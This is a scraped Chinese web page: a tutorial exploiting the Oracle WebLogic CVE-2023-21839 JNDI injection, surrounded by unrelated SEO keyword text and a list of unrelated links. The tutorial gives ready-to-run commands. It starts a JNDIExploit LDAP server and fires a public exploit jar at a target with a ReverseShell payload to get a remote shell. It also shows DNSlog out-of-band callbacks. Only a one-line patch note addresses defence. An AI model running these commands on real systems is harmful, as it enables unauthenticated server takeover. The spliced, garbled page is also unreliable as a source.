当前位置: 首页 > news >正文

用二级域名做网站群邻水建设局网站

用二级域名做网站群,邻水建设局网站,腾讯云服务器centos做静态网站,工作服厂家联系方式一、漏洞概述 RCE漏洞#xff0c;该漏洞允许未经身份验证的远程#xff0c;通过T3/IIOP协议网络访问并破坏WebLogic服务器#xff0c;成功利用此漏洞可导致Oracle WebLogic服务器被接管#xff0c;通过rmi/ldap远程协议进行远程命令执行,当 JDK 版本过低或本地存在小工具该漏洞允许未经身份验证的远程通过T3/IIOP协议网络访问并破坏WebLogic服务器成功利用此漏洞可导致Oracle WebLogic服务器被接管通过rmi/ldap远程协议进行远程命令执行,当 JDK 版本过低或本地存在小工具javaSerializedData时可能导致远程代码执行。 由此可见CVE-2023-21839是一个weblogic的JNDI注入漏洞。 二、影响范围 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0 三、利用方式 反弹shell 一、启用http://your-ip:7001/console可以看到登录界面 下载漏洞利用工具 JNDIExploit-1.4-SNAPSHOT.jar 二、启动ladp服务在kali上同时启动监听 vps上使用JNDIExploit开启ldap协议服务这里注意 1389跟3456端口开放 java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.111.14漏洞EXP下载 https://github.com/DXask88MA/Weblogic-CVE-2023-21839三、启动EXP注意jdk版本仍需低版本原装JDK17不必卸载下载一个低版本的JDK之后切换即可 java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999java -jar 目标服务器ip地址:端口 ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口没有明显的变化 四、查看LDAP服务器成功获取 DNSlog流量外带 eg:java -jar Weblogic-CVE-2023-21839.jar 靶场ip7001 ldap:// xxxxxx.dnslog.cnjava -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap:// vqd5uu.dnslog.cn还可以利用工具实现。。。。 四、漏洞解析 五、漏洞防护 下载最新补丁链接https://support.oracle.com/rs?typedocid2917213.2 限制T3协议访问
http://www.zqtcl.cn/news/853624/

相关文章:

  • 福州定制网站开发北京排名seo
  • 地方门户网站开发方案长沙有哪个学校可以学网站建设
  • 建个购物网站水果建设网站前的市场分析
  • 建网站的目的小程序登录代码
  • 南京有名的网站建设公司自学室内装修设计教程
  • 新乡市做网站的公司开发公司简介企业介绍
  • 礼品网站模板淘宝店铺购买交易平台
  • 属于公司的网站怎么做外贸服装网站开发
  • 做暧网站泸州公司做网站
  • 做文库类网站网站所有权 备案
  • 网站开发主要内容站长之家网站查询
  • 网站推广优化排名公司wordpress添加说说
  • 维护一个网站要多少钱企业怎么做网站
  • 怎么做兼职网站成都必去十大网红景点
  • 网站建设如何传视频教程电脑网站设计公司
  • 网站开发培训教程制作网站开发公司
  • 网站前端做报名框代码seo教育培训机构
  • 做网站要学习什么分销网站
  • 镇江市住房和城乡建设局网站常州建设网站
  • 学做美食的网站男女做暖暖到网站
  • 手机的网站建设目标刚做的网站 搜不到
  • 重庆网站建设哪里比较好呢ps怎么做网站logo
  • 网站建设五项基本原则优化关键词的公司
  • 高端网站的特点p2p网站开发的流程
  • 什么网站做外贸最好坪地网站建设公司
  • 做网站费用怎么核算没有公司 接单做网站
  • 如何建设一个优秀的电商网站wordpress注册去掉电子邮件
  • 站长工具 seo综合查询长沙高校网站制作公司
  • 杭州网站定制开发哪家好wordpress重置
  • 哈尔滨市建设安全网站火车头更新wordpress